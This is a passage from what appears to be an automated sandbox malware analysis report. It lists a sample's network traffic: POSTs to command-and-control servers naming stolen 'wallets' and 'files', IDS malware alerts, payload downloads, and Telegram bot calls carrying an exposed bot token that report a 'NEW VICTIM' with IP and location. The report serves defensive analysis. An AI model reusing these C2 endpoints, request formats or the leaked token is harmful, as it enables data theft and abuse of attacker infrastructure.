name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------JDBGDHIIDAEBFHJJDBFIContent-Disposition: form-data; name="message"wallets------JDBGDHIIDAEBFHJJDBFI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDHHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="message"files------DHIJEHJDHJKECBFHDHDH--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKKFCFIIJJKKFHIEHJKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 46 43 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 2d 2d 0d 0a Data Ascii: ------BKKKFCFIIJJKKFHIEHJKContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------BKKKFCFIIJJKKFHIEHJKContent-Disposition: form-data; name="build"stok------BKKKFCFIIJJKKFHIEHJK--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"stok------HDGIJJDGCBKFIDHIEBKE--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: KLNOPT-ASFI KLNOPT-ASFI

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49858 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49872 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49890 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49931 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49912 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.10:49946 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49957 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49975 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.10:49983 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 185.81.68.147:80 -> 192.168.2.10:49983
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50010 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50037 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:50024 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50039 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50049 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:50065 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:50084 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50259 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50263 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50271 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50299 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50308 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50284 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50238 -> 172.67.213.48:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:50267 -> 172.67.213.48:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0024E0C0 recv,recv,recv,recv,

0_2_0024E0C0

Source: global traffic	HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20921702%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
